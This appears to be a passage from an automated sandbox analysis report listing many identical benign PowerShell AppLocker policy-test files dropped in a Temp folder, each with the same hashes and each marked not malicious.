                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmesryui.yiy.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbiz5gd4.ltn.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iek03czr.jrz.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iewzx1zr.y0e.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iz1tgp1v.1rc.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1hkxrtr.3ee.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jk5xhau2.4hc.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jr0cv2if.f40.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k50uqvzs.22u.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kn23trvn.r0z.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksnthyl5.dgn.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n52knlj1.h4k.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nlk5isrr.dj3.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nodnfb0i.yzb.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nqix1qze.zug.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nr4yrruj.bpt.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ns1ygcut.zpb.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwaxmhut.dfq.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nyl1dlfm.5gg.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o1xcifcm.hx0.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olroghqc.fkf.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onvxvei4.enj.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_op1j3ahn.mb1.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozalvcjm.dvg.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1tj0elw.uq5.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2qmgmoi.bkh.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjjfsrav.m22.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmbpr3un.43t.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rucvwl2j.ctu.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3vhnqja.gan.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svotsons.koz.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1igchem.s0l.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
